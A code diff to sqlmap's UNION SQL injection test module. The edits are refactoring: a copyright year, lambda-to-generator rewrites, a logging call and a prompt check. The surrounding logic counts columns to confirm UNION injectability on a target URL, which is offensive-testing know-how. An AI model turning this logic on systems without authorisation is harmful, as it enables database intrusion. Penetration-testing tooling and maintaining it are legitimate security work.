@@ -1,10 +1,11 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
+import logging
 import random
 import re
 
@@ -114,9 +115,9 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
 
         if not isNullValue(kb.uChar):
             for regex in (kb.uChar, r'>\s*%s\s*<' % kb.uChar):
-                contains = [(count, re.search(regex, page or "", re.IGNORECASE) is not None) for count, page in pages.items()]
-                if len(filter(lambda x: x[1], contains)) == 1:
-                    retVal = filter(lambda x: x[1], contains)[0][0]
+                contains = [(count, re.search(regex, _ or "", re.IGNORECASE) is not None) for count, _ in pages.items()]
+                if len(filter(lambda _: _[1], contains)) == 1:
+                    retVal = filter(lambda _: _[1], contains)[0][0]
                     break
 
         if not retVal:
@@ -133,10 +134,10 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
                 elif item[1] == max_:
                     maxItem = item
 
-            if all(map(lambda x: x == min_ and x != max_, ratios)):
+            if all(_ == min_ and _ != max_ for _ in ratios):
                 retVal = maxItem[0]
 
-            elif all(map(lambda x: x != min_ and x == max_, ratios)):
+            elif all(_ != min_ and _ == max_ for _ in ratios):
                 retVal = minItem[0]
 
             elif abs(max_ - min_) >= MIN_STATISTICAL_RANGE:
@@ -154,7 +155,7 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
 
     if retVal:
         infoMsg = "target URL appears to be UNION injectable with %d columns" % retVal
-        singleTimeLogMessage(infoMsg)
+        singleTimeLogMessage(infoMsg, logging.INFO, re.sub(r"\d+", "N", infoMsg))
 
     return retVal
 
@@ -282,8 +283,8 @@ def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
 
             if not conf.uChar and count > 1 and kb.uChar == NULL:
                 message = "injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] "
-                test = readInput(message, default="Y")
-                if test[0] not in ("y", "Y"):
+
+                if not readInput(message, default="Y", boolean=True):
                     warnMsg += "usage of option '--union-char' "
                     warnMsg += "(e.g. '--union-char=1') "
                 else:
